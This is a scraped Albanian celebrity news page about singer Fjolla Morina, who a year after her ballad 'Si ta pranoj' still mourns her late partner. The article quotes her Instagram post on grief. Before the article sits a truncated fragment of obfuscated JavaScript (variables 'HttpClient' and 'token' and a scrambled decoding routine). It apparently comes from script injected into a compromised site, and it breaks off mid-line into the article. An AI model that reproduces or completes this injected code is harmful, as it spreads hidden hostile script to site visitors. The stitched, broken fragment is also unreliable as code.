;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Një vit nga kënga, Fjolla vazhdon të vuajë humbjen e personit të zemrës

By

Një vit më parë, këngëtarja Fjolla Morina solli baladën ‘Si ta pranoj’ e cila u përfol se ishte dedikim direkt për ish-partnerin i cili u nda nga jeta në mënyrë të beftë e tragjike.

E këtij projekti në një vjetorin e tij këngëtarja i është rikthyer sërish.

Ajo përmes një shkrimi në Instagram ka deklaruar se plagët nuk shërohen nga koha, përkundër kalimit të kësaj të fundit, duke lënë të kuptohet se ende e vuan ndarjen nga jeta të partnerit të saj.

‘Tek kjo këngë i këndoj dhimbjes, asaj dhimbje që kur e ke në lëkurë tënde kupton që koha nuk i shëron kurrë plagët e disa plagë do të dhembin për tërë jetën dhe zemra kurrë nuk ka për tu shëruar. Në këtë dhomë i kam kënduar dashurisë së vërtetë sepse ajo është e pavdekshme. Shumë gjëra në jetë janë tëpamundura dhe jo gjithçka e ka një zgjidhje. Lotët nuk e kthejnë dikë që është larguar nga kjo jetë që është larguar por duke e kujtuar na ndihmon të rritemi pa harruar rrugët që kaluam. Ruaji njerëzit e dashur siçruanipiktuar e vendosni ata në dritën më të mirë’ – shprehet këngëtarja në postimin e bërë.

Në vazhdimësi, jo vetëm në përvjetore, Fjolla shfaqet me doza melankolie, ndonëse asnjëherë nuk është hapur për të folur gjerësisht në lidhje me këtë moment të vështirë të jetës së saj. /Prive.al

Artikuj të ngjashëm